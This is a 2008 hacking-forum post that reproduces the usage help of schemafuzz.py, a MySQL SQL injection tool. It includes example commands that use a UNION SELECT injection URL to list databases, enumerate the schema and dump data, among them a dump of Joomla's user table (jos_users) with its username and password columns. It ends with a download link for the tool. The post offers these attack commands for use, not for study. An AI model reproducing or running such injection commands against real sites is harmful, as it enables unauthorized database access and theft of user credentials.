MasT3r ZaTaN Posted July 29, 2008 Report Posted July 29, 2008 |---------------------------------------------------------------|| rsauron[@]gmail[dot]com v3.5 || 6/2008 schemafuzz.py || -MySQL v5+ Information_schema Database Enumeration || -MySQL v4+ Data Extractor || -MySQL v4+ Table & Column Fuzzer || Usage: schemafuzz.py [options] || -h help darkc0de.com ||---------------------------------------------------------------| Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com Modes: Define: --dbs Shows all databases user has access too. MySQL v5+ Define: --schema Enumerate Information_schema Database. MySQL v5+ Define: --dump Extract information from a Database, Table and Column. MySQL v4+ Define: --fuzz Fuzz Tables and Columns. MySQL v4+ Define: --info Gets MySQL server configuration only. MySQL v4+ Required: Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" Mode dump and schema options: Define: -D "database_name" Define: -T "table_name" Define: -C "column_name,column_name..." Optional: Define: -p "127.0.0.1:80 or proxy.txt" Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt Define: -end "/*" or "--" Default is "/*" Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "--" -o sitelog.txtDownload http://www.darkc0de.com/others/schemafuzz.py Quote
